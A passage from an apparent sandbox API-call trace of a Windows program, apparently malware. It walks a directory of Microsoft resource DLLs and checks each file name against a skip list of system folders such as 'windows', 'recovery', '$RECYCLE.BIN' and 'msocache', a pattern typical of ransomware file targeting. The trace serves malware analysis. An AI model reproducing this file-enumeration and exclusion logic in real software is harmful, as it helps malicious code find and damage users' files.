hHeap=0x1e0000) returned 1 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.460] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1d038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.460] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dba8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.461] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1698075, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1698075, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.461] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4bab0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.461] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.462] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.462] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1860d8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1860d8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1860d8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47ae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.462] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d698, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23ddc8 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.463] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1814809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7af0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d578, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.463] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb8b74ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb8b74ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8b74ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.463] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d578, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dcb0 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.464] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a090, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.464] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", 